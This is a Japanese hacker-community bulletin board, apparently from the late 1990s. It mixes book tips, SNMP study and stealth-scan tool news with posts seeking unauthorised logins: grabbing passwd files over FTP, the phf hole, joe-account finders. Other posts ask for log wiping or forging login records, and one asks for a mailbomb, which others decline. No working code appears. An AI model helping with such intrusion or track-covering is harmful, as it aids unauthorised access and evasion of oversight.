| 【名 前】cheru 【タイトル】re:(1)勝手に代理:れ 03/12 05:15 |
|
| 【メッセージ】 レスどうもありがとうございます ただ、アノニでFTPしても shadowされてて master.passwdのパーミッションは 600で読めないんです。 どうしたらいいのか全く分かりません >カゴメ生活さん レスありがとうございました フリーshellとは passwdが設定されていない アカウントを使うということなのでしょうか 本当にすみません |
| 【名 前】mai 【タイトル】ども 03/12 02:22 |
|
| 【メッセージ】 飲みに行きましょう。 っていうかそれしか言ってないなぁ(笑)。 んで、ami、カゴメ、良かったらソース見せてよ。 |
| 【名 前】ami 【タイトル】易斡粟゙ 03/11 23:23 |
|
| 【メッセージ】 既存のでええやん。 もしくわ、ちょろっと暗号化のヤツならあるけど。 それでええなら暫定的にってことで あと、どなたか、アパッチの最新版をrootでたてる方法ご存じの方いません? 四苦八苦してます(笑) オプション付けてコンパイルしてんすけどねぇ。。 知ってはったら、よろしゅう頼んます。 |
| 【名 前】カゴメ生活 【タイトル】う 03/11 13:16 |
http://www.kagome.co.jp |
| 【メッセージ】 ごめん直す 仕事とかそこら片付いたら。 amiがやるならやってくださいな。 んで、ログインできませんですか。 フリーshellあるサーバ使いましょう それくらい自分で探せるでしょ? >ログインできない人 |
| 【名 前】Kyochang 【タイトル】勝手に代理:れ 03/11 04:32 |
|
| 【メッセージ】 >どうしたらログインできるのでしょうか アノニマスftpサーバーなら入れるよー ID anonymous PASS newbie@pfh.org で、どうでしょう。 というか、んと、phfはまぁいいとして。 おいら白木さん使ったことないので どんなものか知らないけど、リモートホストって他人様のところのコトだよね? あんまりガンガンやってると 怒られちゃうよ。それでログイン出来たとして、 ログ残して、それ使ってちゃまた怒られるだろうし、 んー、そういう事を聞くような知識のうちはそういう事に、まだ手ださないほうが ボクはいいとおもうよん とかこんな事書いててよろしいのかしらん(笑) |
| 【名 前】cheru 【タイトル】はじめまして 03/11 03:42 |
|
| 【メッセージ】 はじめまして 本当に申し訳ありません 突然ですが教えてください FTPでpasswdをとろうとしたり 白木葉子でjoe探したり phf等試みたのですが どうやってもリモートホストに ログインできません どうしたらログインできるのでしょうか 具体的に教えてください 宜しくお願いします 初めての書き込みでいきなり 教えてくださいですし、 場に合わない質問で本当にすみませんが どうかお願いします |
| 【名 前】ami 【タイトル】あいやまぁ 03/11 03:28 |
|
| 【メッセージ】 ヤツがデバッグしないから あれつぶれちゃいました。 ったく、ラブラブICQしてる場合じゃないぞ!(はぁと |
| 【名 前】UNYUN 【タイトル】れ 03/10 19:23 |
unewn4th@usa.net |
| 【メッセージ】 遊びに行ってて、しばらく留守にしてました。 >W.Fieldさん ええと、白木はもうすぐ配布中止にするかもしれませんので、 バージョンアップはしない予定です。 >HAEさん ulw.cの件ですが、 原因は分かったんですが、このようなケースでは、わりと修正を 加えないといけませんので、ちょっと待っててください。 wtmp系、utmp系ならUNYUNZ(PenguinTools)もアップしてますよ。 原理は簡単です。PenguinDocumentのログ関連のドキュで分かると 思います。 |
| 【名 前】ponpoko 【タイトル】でも 03/09 23:03 |
ponpoko@eastmail.com |
| 【メッセージ】 TO J.J.さん 地方って事でのレスならもしかして 知ってるのかなあ(笑) |
| 【名 前】ponpoko 【タイトル】うーん 03/09 22:59 |
ponpoko@eastmail.com |
| 【メッセージ】 To J.J.さん きっと違うと思う・・・・。 |
| 【名 前】HAE 【タイトル】a)Zs 03/09 21:28 |
puyoo@geocities.co.jp |
| 【メッセージ】 ちょっと久しぶりです。 Unixのログ消しをする方法はいくつかありますが、ログを作るツールは ないのでしょうか?存在するユーザーのログを適当に書き込みごまかしたいのです。 そういえば、うにゅんさんログ消しツールの修正忘れちゃいましたか?(^^; |
| 【名 前】ponpoko 【タイトル】でも 03/09 23:03 |
 ponpoko@eastmail.com |
| 【メッセージ】 TO J.J.さん 地方って事でのレスならもしかして 知ってるのかなあ(笑) |
| 【名 前】ponpoko 【タイトル】うーん 03/09 22:59 |
ponpoko@eastmail.com |
| 【メッセージ】 To J.J.さん きっと違うと思う・・・・。 |
| 【名 前】HAE 【タイトル】a)Zs 03/09 21:28 |
puyoo@geocities.co.jp |
| 【メッセージ】 ちょっと久しぶりです。 Unixのログ消しをする方法はいくつかありますが、ログを作るツールは ないのでしょうか?存在するユーザーのログを適当に書き込みごまかしたいのです。 そういえば、うにゅんさんログ消しツールの修正忘れちゃいましたか?(^^; |
| 【名 前】J.J. 【タイトル】はっかーじゃぱん 03/09 12:40 |
|
| 【メッセージ】 vol.3がでましたねー 最初買うつもりはなかったんですけど(汗) Vladさんの英会話教室(笑)を読んであまりにも ウケてしまったので思わず買っちゃいました。 |
| 【名 前】J.J. 【タイトル】チャンスを逃した(TT) 03/09 12:36 |
|
| 【メッセージ】 To 充実野菜さん >来てね。あ、今日だけね(笑) あう、amuserが落ちていると思っていたら その隙にこんな事が、、、 onlineでもお会いしたかったなーと(哀) To UNYUNさん >うぅ.... えーと... ここではナンですから...(汗) えーと、何処だったら宜しいですか?(大汗) To ponpokoさん もしかして、あのponpokoさん? 間違ってたらすいません(汗) |
| 【名 前】W.Field 【タイトル】Thx for archives 03/09 02:02 |
wfield@mcn.ne.jp |
| 【メッセージ】 (Win版)白木とextusrをDLさせていただきました。 どうもです〜 それで、ちょっと変なとこに気付いたので報告。 白木がyouko.cfgをカレントディレクトリに作るようになっているみたいで、 リストをextusrのディレクトリに読みに行くと youko.cfgがextusrのとこに作られてしまい、 起動時にはyouko.exeのあるディレクトリのcfgを読み込むため、 cfgが役に立ってません。 まぁ、リストを白木のディレクトリに入れとけば問題ないですけどいずれ直しといて下さい。 |
| 【名 前】UNYUN 【タイトル】re:(1)おふー 03/07 22:40 |
|
| 【メッセージ】 うわぉ。amiさんじゃないっすか。こんばんわ〜 >おいらもうにゅんさんに会いたいっす〜 わたしもamiさんに会って「イロイロ」と聞いてみたいです(笑) だいたい謎だらけっすよ〜>あっち *a*さんも(笑) >UGの有名人ってのが誰なのかってのが気になるところっすー うぅ.... えーと... ここではナンですから...(汗) |
| 【名 前】ami 【タイトル】おふー 03/07 21:38 |
|
| 【メッセージ】 おいらもうにゅんさんに会いたいっす〜 というかうにゅんさんから見た UGの有名人ってのが誰なのかってのが気になるところっすー |
| 【名 前】充実野菜 【タイトル】いろいろ含めて 03/06 00:37 |
|
| 【メッセージ】 ircの日本のサーバに #augc というchを作って待機してます。 来てね。あ、今日だけね(笑) |
| 【名 前】ponpoko 【タイトル】ぼくも・・・ 03/05 22:24 |
ponpoko@eastmail.com |
| 【メッセージ】 僕もって、地方だからなあ・・・。 |
| 【名 前】wannab 【タイトル】re:(5)ファイバー・オプティックと会った 03/05 13:14 |
j_-p@usa.net |
| 【メッセージ】 >じゃあ、一度飲みにでも行きましょう。 >いろんな人呼んで。 あぁ、σ(^^)も行きたい・・ 新参者は駄目でしょうか? |
| 【名 前】wannab 【タイトル】ガセネタ 03/05 13:08 |
j_-p@usa.net |
| 【メッセージ】 いろいろ見て回ったのですが どうも例の衛星騒ぎはガセネタである可能性が出てきました。 詳しくはl0phtの発表もしくはそれを載せてるHNNを見てくださったら わかると思います。 で、代わりといってはなんですがドイツの米軍基地のweb serverに 誰かが侵入したようです。 これは正式発表があったのでガセではないと思います。 でわでわ |
| 【名 前】Hariru 【タイトル】ポートスキャンのドキュメント 03/05 11:16 |
hariru@eastmail.com |
| 【メッセージ】 ポートスキャンって具体的にはどうやっているのだろうと思っていましたが、 これ読んでよくわかりました。ありがとうございます〜 ただ、Socketなどは私の未知領域なため詳細までは理解できていません〜 うう・・・、もっと精進しなくては。 ところで、[例3. Stealth(ACK)スキャン]はポート80が開いているんですよね。 ポート23が開いていると説明してありますが。 PS. メールアドレスをhariru@eastmail.comに変えました。 Penguin Membersの方も修正しておきましたが、 メールを送る方は気を付けてくださいませ。 |
| 【名 前】UNYUN 【タイトル】re:(5)ファイバー・オプティックと会った 03/04 21:35 |
unewn4th@usa.net |
| 【メッセージ】 >つーわけでとりあえずirc来てくださいな。 >詳細はあっちで。 お、いいっすねー。 了解です。 |
| 【名 前】充実野菜 【タイトル】re:(4)ファイバー・オプティックと会った 03/04 21:06 |
|
| 【メッセージ】 >ちゅうか、充実野菜さんも会ってみたい人ですね。 >私、ミーハーですから(笑) >いままでOFFなんて一回もないからUG人と会ったことないですし。 じゃあ、一度飲みにでも行きましょう。 いろんな人呼んで。 なんだかんだいってオレ結局めちゃいろんな人と会ってる気がする。 つーわけでとりあえずirc来てくださいな。 詳細はあっちで。 |
| 【名 前】J.J. 【タイトル】あらACさん 03/04 09:32 |
|
| 【メッセージ】 それじゃうちもlink切っておきますね(汗) って他人様のBBSで発言する事じゃないかも |
【タイトル】re:(1)ByeBye
03/03 21:33
unewn4th@usa.net| 【メッセージ】 >HomePage止めましたので、Linkを切って下さい。 あら、閉鎖ですか。 まぁ、イロイロと事情もあるということで... リンク切りの件は、了解しました。 |
| 【名 前】UNYUN 【タイトル】re:(1)お願いします(泣) 03/03 21:20 |
unewn4th@usa.net |
| 【メッセージ】 >このアドレスの人は、掲示板を荒らして回っています。 >私の知人も被害にあいました。 禁止事項に書いてますけど、自分のもの以外のIDを本人の了承なしに 書き込まないようにしてください。 申し訳ありませんが、削除させて頂きます。 >でも私には手の打ちようがありません(泣) >ここでこのような発言をするのは、不謹慎だと思いますが、 >悩んだ末の事です。 >メールボムを送れる人がいましたら、送って頂きたいのです。 >すみません、わがままで・・・・ そういう用件なら、よその掲示板でもっと適切な所がありますので、 そちらを当たられると、助けてくれる人もいるかもしれません。 カルトブックマーク辺りから、イロイロと探してみてください。 |
| 【名 前】Say D 【タイトル】始めまして。 03/03 20:50 |
say_d@geocities.comhttp://i.am/say_d/ |
| 【メッセージ】 こういうページを探していました。 これからこのページに毎日お邪魔して書いてあることが 理解できるように勉強していきたいと思います。 これからもお願いします。 |
| 【名 前】AC 【タイトル】ByeBye 03/03 19:13 |
http://base.oc.to/Lusteen_Carmine/ |
| 【メッセージ】 >UNYUNしゃん HomePage止めましたので、Linkを切って下さい。 最後のお願い。 じゃ、がんばって下さいね。 |
| 【名 前】cyban 【タイトル】>お願いします(泣) 03/03 16:40 |
|
| 【メッセージ】 困ってるなら、geocities.co.jpにメールすれば。 メールアドレスも、わかってるんだし。 わざわざ危険を冒してまで、 他人にメールボム送る人っているのかなぁ。 とりあえず、geocities.co.jpに相談することをお勧めします。 |
| 【名 前】wannab 【タイトル】軍事衛星 03/03 12:17 |
j_-p@usa.net |
| 【メッセージ】 はじめましてです。_(._.)_ 凄く充実したサイトのここを発見して嬉しいかぎりです。 頑張ってくださいね。 で、ちょっと最近例の女王様の軍事衛星ハッキング事件の情報を 興味から探しています。 2月の始めにやられた例のあれです。 公になった元記事はSunday Business@Feb/10のようです。 やられた衛星は全部で4つ。 各衛星は最近打ち上げられたものから10年前のものまでさまざま なようです。 だから各衛星の受信システムをつつかれたのではなく、送信側の コントロールシステムを根こそぎやられたんじゃないでしょうか? 衛星はハンプシャーのRAFによって管理されていたようです。 (間違ってる場合はごめんなさい_(._.)_) どんな些細なことでもいいから教えてください。 |
| 【名 前】UNYUN 【タイトル】re:(3)ファイバー・オプティックと会った 03/02 20:15 |
unewn4th@usa.net |
| 【メッセージ】 >あと一緒に写真もとった。 いいな、いいな〜 ちゅうか、充実野菜さんも会ってみたい人ですね。 私、ミーハーですから(笑) いままでOFFなんて一回もないからUG人と会ったことないですし。 そういえば、某BBS2でOFF会の話とかイロイロ出てたんですけどねぇ。 イナカに住んでるとこういう時不便... >あと公開用のヤツもそろそろやろうかなと あれですね。う〜ん、そろそろ... |
| 【名 前】J.J. 【タイトル】re:ファイバー・オプティックと会った 03/02 11:37 |
j.j.z@bigfoot.comhttp://www.geocities.com/Area51/Comet/1395/main.html |
| 【メッセージ】 う、うらやましーです(涙) 私もあからさまにミーハーですから(笑) いまだにlinuxやFreeBSDのインストールで苦しんでいる 自分なのでskillは全然上達してないんですけれどね。 (充実野菜さんに)憧れてこの世界に足を突っ込んだのですが わたしにとってはUNYUNさんやreverseさんも是非会ってみたい UG界の方々なんですよ。 OFFで会うと言うのも田舎に住んでいると難しいですよね(笑) |
| 【名 前】reverse 【タイトル】re:(3)ファイバー・オプティックと会った 03/02 00:48 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 >あっちの方のハンドルで充実野菜はないでしょう(笑) あの、引っかかった口なんですけど。 おいしそうな名前だな、とか思って(笑) しかし、英語が喋りたい。 ていうか、休みがあれば行きたい... |
| 【名 前】充実野菜 【タイトル】re:(2)ファイバー・オプティックと会った 03/01 22:56 |
|
| 【メッセージ】 ファイバーオプティックはもちろん生ですよ(笑) 握手までしちゃった。うはは あと一緒に写真もとった。 すっげーニコニコしてたよ、おれ(笑) つーか、有名どころの人と会いたいなら メールくださいな。 遊びにいきましょう。 んで正体ははじめっからバラしてましたって(笑) あっちの方のハンドルで充実野菜はないでしょう(笑) ちゃんと考えます。 あと公開用のヤツもそろそろやろうかなと 考えちゅう。。 |
| 【名 前】UNYUN 【タイトル】第1段 03/01 19:29 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551 |
| 【メッセージ】 実用編第1段のステルスポートスキャン関連のドキュメントを Penguin Documentにアップしました(fortune側)。 |
| 【名 前】UNYUN 【タイトル】re:(1)Simple Stealth 03/01 18:44 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551 |
| 【メッセージ】 >#include <sys/time.h> >(全角から半角にしてください) >の一行が必要でした。 あ、そうですか。どうもありがとうございます。 修正しておきます。 |
| 【名 前】UNYUN 【タイトル】re:(1)ファイバー・オプティックと会った 03/01 18:41 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551 |
| 【メッセージ】 会ったって... もしかして"生"...ですか? う、うらやましい... 私ってミーハーだし、会ってみたい人たくさんいるしぃー。 ちゅうか、今まで一回もOFFなんてないもんだから、UG人と会った ことさえまるでないんですよ。ふぅ。 しゃーないから、育成中... >詳しくはうちにそろそろ公開予定のコラムにて。 おぉ、とうとう正体バラしましたねー この調子でどんどん行きましょう(謎) |
| 【名 前】blue3 【タイトル】Simple Stealth 03/01 16:07 |
blue3@usa.net |
| 【メッセージ】 毎度お世話になってます。 Simple Stealth Ver1.0 を slackware3.6 でコンパイルしたみたところ、 #include <sys/time.h> (全角から半角にしてください) の一行が必要でした。 そんだけです。 |
| 【名 前】充実野菜 【タイトル】ファイバー・オプティックと会った 03/01 15:58 |
defcon0@ugtop.comhttp://www.ugtop.com/defcon0/index.htm |
| 【メッセージ】 ちょっと自慢っす。 ファイバーオプティックことMark Abeneと会いました。 侵入の話とかタイムネットの話とかLoDの話とかいろいろ聞いたっす。 いやー、マークはイイやつだったっす。まじで。 おもろかった。英語できるやつがはじめいなかったけど 最後の方はVladさんが通訳してくれて、 「いまから日本の女をハックしにいこうぜ!」とか いってた(笑) そういや、マークはFreeBSDつかってるらしい。 Linuxの読み方は「ライナックス」だそうです。 iMacなんかケリいれてやるぜ!とか言ってた。わはは いやぁ、 マークから貰った名刺がかなーりうれしかった。 うへへへ 詳しくはうちにそろそろ公開予定のコラムにて。 でわでわ。 |
| 【名 前】Hariru 【タイトル】re:(5)Penguin Reference 02/28 22:29 |
hariru@ami.602.cc |
| 【メッセージ】 >だいたいの本は全部読みます。 >1〜3日で一気に読んで、あとは必要に応じてってとこです。 うおっ。無茶苦茶早く読みますね。 私なんかやっと「たのしいUNIX」を読み終わって、 続編に向かっているところなのに。 というか、某有名ゲームにはまって読む時間が(笑) >HDDはちょっとづつ区切っときましょう(笑) >Win98、NT、Solaris7、FreeBSD、Linux...etc あっ、なるほど。 最近のHDDはかなりの容量持ってますから、 区切っちゃえばいろいろ入りますね。 UNYUNさんがいくつもOSを持っているのはそのためでしたか。 納得、納得。 |
| 【名 前】UNYUN 【タイトル】re:(4)Penguin Reference 02/27 22:47 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551 |
| 【メッセージ】 >それら全ページを読んでいるんでしょうか。 だいたいの本は全部読みます。 1〜3日で一気に読んで、あとは必要に応じてってとこです。 もちろん、APIモノやシステムコール関連のは全部読みませんけど(笑) >こうなったらと、至急おニューのパソコンを発注。 >一応対応するかどうか調べましたが、動くかどうか心配。 >ちなみに、就職祝いということで私の懐は痛みません。ラッキ〜 これで本格的にやれますね。 HDDはちょっとづつ区切っときましょう(笑) Win98、NT、Solaris7、FreeBSD、Linux...etc |
| 【名 前】Hariru 【タイトル】re:(3)Penguin Reference 02/27 20:36 |
hariru@ami.602.cc |
| 【メッセージ】 これから学んでいきたいこともまだまだ多いので、 Penguin Referenceはとても参考になります。感謝感謝。 ところで、みなさんかなりの数のテキストを持っているようですが、 それら全ページを読んでいるんでしょうか。 私の場合、必要な箇所だけ読んでパソコンの横に山積みになってますが・・・ あっ、言い忘れていましたが、Solaris7注文して4日(早い!)で来ました。 しかしうちのマシンでは、いろいろなところに不都合が出てくると判明。 こうなったらと、至急おニューのパソコンを発注。 一応対応するかどうか調べましたが、動くかどうか心配。 ちなみに、就職祝いということで私の懐は痛みません。ラッキ〜 |
| 【名 前】ponpoko 【タイトル】ISBNも・・・・ 02/27 08:47 |
ponpoko@eastmail.com |
| 【メッセージ】 reverseさん、はじめまして。 本のところ見せていただきましたが、出来たらISBNもあった方が 注文しやすいと思います。 で、 インターネットセキュリティー プロフェッショナルリファレンス 運用編の、ISBNは4-7973-0604-1です。構築編は今手元にないので 後日に・・・・・。 |
| 【名 前】UNYUN 【タイトル】re:(2)Penguin Reference 02/27 01:06 |
unewn4th@usa.net |
| 【メッセージ】 >えと、ホームページの「本」ってやつ、使ってやってください。 え、いいんですか? では、遠慮なく使わせていただきます。 >だらだら書いてますが、端折っていただいてけっこうです。 いや、詳しい方がいいですから、あのまま使わせてもらいますね。 しかし、Penguin Reference書いてて、値段とか出版社調べてるうちに、 欲しくなって思わず何冊か買っちまいました。 インターネットっショッピングって便利だけど、請求書がコワい(汗) |
| 【名 前】reverse 【タイトル】re:(1)Penguin Reference 02/27 00:34 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 えと、ホームページの「本」ってやつ、使ってやってください。 だらだら書いてますが、端折っていただいてけっこうです。 #simplestealth.c、たいへん参考になります。感謝。 |
| 【名 前】UNYUN 【タイトル】Penguin Reference 02/27 00:02 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551 |
| 【メッセージ】 例のオススメ本のページ、「Penguin Reference」 をアップしました。 出版社とか値段とか調べてたんで、ちょっと遅くなりましたけど... 他にもオススメ本があったら、BBSで紹介してくださいね。 定期的に更新しますから。 |
| 【名 前】UNYUN 【タイトル】re:(3)SNMP 02/26 22:36 |
unewn4th@usa.net |
| 【メッセージ】 >SNMP全体(他のものも)の理解が必要だと思うのは私だけ? うひー。「活」が入りましたねー(笑) でも、SNMPのメインはやっぱりMIB云々でしょう? もちろん、ちゃんとベースまで掘り下げる必要はあると思いますよ。 でないとたぶん飽きるし(笑) でも、よく分からんから途中で投げちゃってるしなぁ... |
| 【名 前】野菜生活 【タイトル】re:(2)SNMP 02/26 20:56 |
|
| 【メッセージ】 MIBとか見ればわかるじゃないですか。 でもまぁ、見たいだけならツール使った方が速いですけどね。 スクリプトキッズとかいわれないためにも SNMP全体(他のものも)の理解が必要だと思うのは私だけ? |
| 【名 前】UNYUN 【タイトル】re:(2)SNMP 02/26 20:34 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551 |
| 【メッセージ】 >SNMPはMIBとか情報ベースの理解が主だと思うのですが、いかがでしょうか? ですね。 そこらのプロトコルみたいにナメてかかると痛い目にあいますから(笑) しかし、もうちょい単純にならんのでしょうかね。 >ちなみに、ツールは >CMUのヤツ一式とWS_Pingで十分なような気もしますが、どうでしょうか? >あとネットキッズかな?金払ってね :-) 私も(笑) あと、rtinfoも使います(お試し版ですけど)。 でも、UG用途にはやっぱしんどいですね。 どっからでもリクエスト受付してるなら、webのロギングで 串鯖のTCP-connection引っ張り出して、IPをロギングするとか。 あと、RMON-MIBなんかは、FilterとかCaptureとかで かなりアレなことができるんじゃないでしょうか。 UGっぽくremote-snifferとか(笑) もうすぐ本が来るので、もっぺんやってみよ... |
| 【名 前】UNYUN 【タイトル】ネタ 02/26 19:51 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551 |
| 【メッセージ】 パケットネタが流行りみたいなんで、 Penguin Academyの「TCP/IP基礎講座」の カリキュラムだけでも組もうかと。 どうでしょう?>Rorrimさん 時間が空いたら、めるください。 あと、「実用編」っぽいのとして、パケットネタ関連の Documentを、作成したToolsと一緒にイロイロ公開する予定です。 「実用編」は、アカデミックじゃないので(笑)、PenguinDocument とPenguinToolboxに出していきます。 とりあえず、第1段は「Stealth Scan」ってことで。 Half-Open、Stealthスキャン & SYNでのOS判別をする 「Simple Stealth」を作ってアップしときました。 パケットネタをこれからやろうという人は、とても短いソースです ので読んでみてください。 (今はfortune側だけですが、明日にでもbase側にアップしときます) Document「Full&Half、Stealthスキャン、OS判別の原理と対処法」 を今書いてます。近日中にアップしますので。 あと、BBSにあったパケットネタ関連も含めて、イロイロなネタや実験 結果もまとめてアップする予定です。>Penguin Resources Penguin Referenceもやってますんで、ちょっとお待ちを。 |
| 【名 前】reverse 【タイトル】re:(1)SNMP 02/26 19:48 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 SNMPはMIBとか情報ベースの理解が主だと思うのですが、いかがでしょうか? ちなみに、ツールは CMUのヤツ一式とWS_Pingで十分なような気もしますが、どうでしょうか? あとネットキッズかな?金払ってね :-) |
| 【名 前】taka 【タイトル】re:(2)はじめまして 02/25 00:25 |
taka@windows.squares.net |
| 【メッセージ】 >>基本的なツールの使い方講座みたいなのはしないんでしょうか? >基本的なツールをとことん使い倒すってのは、とても良いと思います。 >というか、takaさん、作られてはいかがでしょうか? ん〜、人に丁寧に紹介するって言うのが苦手でして いつも 「man を読め」とか「RFC を検索すれ」で 回避してるんです。 >>ネットワークの規模 >nmapでスキャンか?! いや DNS のゾーン情報です。 もしくは strobe かなぁ。 ログに残るけど、あの速さは捨て難い。 >高速なマシンと十分な時間があれば、 >小さな国全体を調査できる可能性がある。 なんて man に書いてあるだけありますよ。 |
| 【名 前】reverse 【タイトル】re:(1)はじめまして 02/24 19:24 |
esrever@usa.net |
| 【メッセージ】 >基本的なツールの使い方講座みたいなのはしないんでしょうか? 基本的なツールをとことん使い倒すってのは、とても良いと思います。 というか、takaさん、作られてはいかがでしょうか? >ネットワークの規模 nmapでスキャンか?! >オライリーカタログ 秋葉原の書泉に置いてありました。勿論ゲット。 |
| 【名 前】100%野菜生活 【タイトル】re: 02/24 13:33 |
|
| 【メッセージ】 おお、うにゅんさんSNMPのRFC読めるんですか・・・ すごいっすねぇ。 野菜生活は未だにマクロがわかりません。 全項目マクロで定義すんなっつーの(笑) |
| 【名 前】UNYUN 【タイトル】re:(1)SNMP 02/24 08:03 |
unewn4th@usa.net |
| 【メッセージ】 >技術的な解説をもうすぐしたらアップしますヽ(´ー`)ノ うーん、突破したんですか... 以前に、「いっちょ作るか」なんて、RFCとかタラタラ読んだり 実験してたりしたんですが、思ったよりしんどくて途中でほったらかし になってしまってます。 噛みくだいたの、お願いします(爆) 本もちゃんと買っときますから〜 |
| 【名 前】 【タイトル】お薦め本 02/24 06:05 |
|
| 【メッセージ】 実用的じゃないんですが http://www.oreilly.co.jp/newcata.htm で注文できる(無料です) 「オライリージャパン 1999 カタログ」 眺めてるだけでも面白いんでお薦めです。 |
| 【名 前】taka 【タイトル】はじめまして 02/24 05:39 |
|
| 【メッセージ】 UNX なサイトの出会えて嬉しいです。 こちらはオリジナルツールが中心のようですが 基本的なツールの使い方講座みたいなのはしないんでしょうか? whois と nslookup でネットワークの規模を探るとか telnet は万能ツールであるとか・・・ 簡単すぎてだめですかね、やっぱり |
| 【名 前】100%野菜生活 【タイトル】SNMP 02/23 21:27 |
|
| 【メッセージ】 うーむ、、、 結局TLVなだけらしい。 こんなもんの為に悩んでたかと思うとちょっとくやしい(笑) ただ、依存ナシとかつっても ビットをがりがりいじるのはやめて欲しいなぁ・・・ もっと単純明快にしろっつーの>SNMP てなわけでSNMPを使うアプリなら大抵のもの(UG系ね) なら作れそうです。 技術的な解説をもうすぐしたらアップしますヽ(´ー`)ノ |
| 【名 前】Hariru 【タイトル】re:(2)11種類の新鮮な果実と野菜をブレンド状態 02/23 14:07 |
hariru@ami.602.cc |
| 【メッセージ】 >ところで、私のハンドル、せっかくカッコよくアルファベットにした >のに、誰も気付いてくれない... いやあ〜、気づいていたんですが、アルファベットだと、 UNYUNさん本人とすぐにわからなかったという方を見かけましたので、 こっちの方がよいかなと。 それに、なぜだか「うにゅん」さんの方が親しみがわくんですよね・・・。 でも、これからは「UNYUN」さんと統一しますです。 ちなみに私のHNは、以前書いた小説の主人公となっています。 が、結局その小説は、出版社にも出すことなく消えちゃいました〜。(笑) まあどうせ出せる品物じゃなかったから、別にいいけどね。 |
| 【名 前】Hariru 【タイトル】re:(2)tar 02/23 14:05 |
hariru@ami.602.cc |
| 【メッセージ】 >上のができるとすると、tar じゃなくてシステム全体の問題になって >くるような気がします。 確かに。当然といえば当然ですよね。 こんな初歩的な問題は、何らかの手を打っているはずです。 b1ue3さん、私のくだらない質問に答えてくれてありがとうです。 |
| 【名 前】UNYUN 【タイトル】re:(1)11種類の新鮮な果実と野菜をブレンド状態 02/23 03:43 |
unewn4th@usa.net |
| 【メッセージ】 >「SNMPインターネットワーク管理」買って >きたんだけどこれマジですげぇいいっすよ。 うぉ、メモメモ。 >あと、オライリーのFW構築も入手。 ちょっとぶっといけど、結構楽しかったですよー。 >1-800版のスキャンとかWarDialerの作動画面とかでてて、 >さらにPBXハックがどうのとかかいてて わーお。そんな本、日本で売ってるんですか? そういう本って、アメリカでも結構大きい本屋にしか置いてないのに... もし訳本だったら、出版社もチャレンジャーですね(笑) >ハンドルころころ変えてすまんっす(笑)わはは いや、全然問題ないですよ〜 しかし、なんでまた野菜生活... あ、でも結構イカしてるかも(笑) ところで、私のハンドル、せっかくカッコよくアルファベットにした のに、誰も気付いてくれない... みんな素でひらがなだし(泣) まぁ、いいか... |
| 【名 前】野菜生活カゴメ 【タイトル】↓下の 02/22 15:05 |
|
| 【メッセージ】 本は翔泳社ですよ。 なんか改めてみると誤字多いなー>野菜生活100 つーわけでカゴメに変えてみましたヽ(´ー`)ノ |
| 【名 前】野菜生活100 【タイトル】11種類の新鮮な果実と野菜をブレンド状態 02/22 06:22 |
http://www.kagome.co.jp/uso.htm |
| 【メッセージ】 いやぁ、今日渋谷の大成堂(?)ってとこで「SNMPインターネットワーク管理」買ってきたんだけど これマジですげぇいいっすよ。 BER(だっけ?)の詳しいエンコードとかタイプ宣言部分が詳しく書かれてて あのクソSNMPパケットの謎がやっと解けそうな感じがします(笑) パケットやる人にはマジでお勧めしたいですね、これ。 後半部分はそこらの本よりちょっといいかんじ。 ありがとうございます>reverseさん あと、オライリーのFW構築も入手。 こちらもなかなか読み応えがありそうで、 これからじっくり読む予定。 それよりびびったのが、インターネットセキュリティとかゆータイトルの 外人が書いた本で、最後の方をぺらぺらめくってたらいきなり1-800版のスキャンとか WarDialerの作動画面とかでてて、さらにPBXハックがどうのとかかいてて ここは日本やっちゅーーねん!!!とおもわずいいそうになりました。 あんな本うれねーよ(笑) わははは とりあえず今日はこの時間まで飲んでたので感想はまたのちほど。 ハンドルころころ変えてすまんっす(笑)わはは |
| 【名 前】UNYUN 【タイトル】本 02/20 23:44 |
unewn4th@usa.net |
| 【メッセージ】 留守の間に、オススメ本のカキコがいっぱい... 〜氏推本ってことで、まとめときますね。 >ぽとぴんさん はじめまして(?) >全体的に買いだよね。 >特にFWのやつ、あれはよい。 「ファイア─ウォールの構築 -インターネットセキュリティ-」 ですか? いいですよねー。オススメですね。 あと、昨日行った秋原のT・ZONEにSNMP本がありました。 タイトル忘れましたけど、アレは翔泳社本じゃなかったような... さらっと立ち読みしただけですけど、MIB2の詳細な解説もあり、 いい感じでした。 買おうかな〜と思いましたけど、オカネなかったので... |
| 【名 前】sp00ky 【タイトル】サーチしたページ 02/20 23:34 |
|
| 【メッセージ】 こんにちわ sp00kyです。いま会員HPをDLしようとしているのですが CGIとかでできたサーチで「a+i+u+e+o」とやれば 全部のページがでますよね、それでいざGETRIGHT!!とおもったら CGIをDLしてしまうんです。 やっぱり地道しかないのでしょうかー |
| 【名 前】b1ue3 【タイトル】re:(1)tar 02/20 13:12 |
blue3@usa.net |
| 【メッセージ】 初めまして。 >System Vでは-oを付けないと、tarでまとめたユーザ(ID)の所有物になるとのこと。 >となると、自分のrootでまとめたファイルをほかのSystem Vで復元すると、 >そこのrootの所有物になるってことですか? コマンド tar が自分の UID で動く限り(SUID とかがなければ)、 無理でしょうね。 上のができるとすると、tar じゃなくてシステム全体の問題になって くるような気がします。 ~ |
| 【名 前】S 【タイトル】re:(2)オライリーは 02/20 00:36 |
cleangear@mail.goo.ne.jphttp://members.tripod.com/~cleangear/main.html |
| 【メッセージ】 >SNMP なかなか良い本が無いんですよね。 良い本があったら、ぜひとも教えて欲しいです。 ・・・ここに書くのもお久しぶりです。 |
| 【名 前】reverse 【タイトル】re:(1)オライリーは 02/19 19:21 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 >最近TCP/IPの本がでたらしい。。 「TCP/IPネットワーク管理」というナッツシェル本は持ってますが。 これも良い本です。 >SNMP まだ買ってないのですが、 「SNMPインターネットワーク管理」翔泳社 なんてよさそうでしたよ。 ちなみに説明が紀伊国屋ブックサーチにあります。 |
| 【名 前】Hariru 【タイトル】tarについて 02/19 11:21 |
hariru@ami.602.cc |
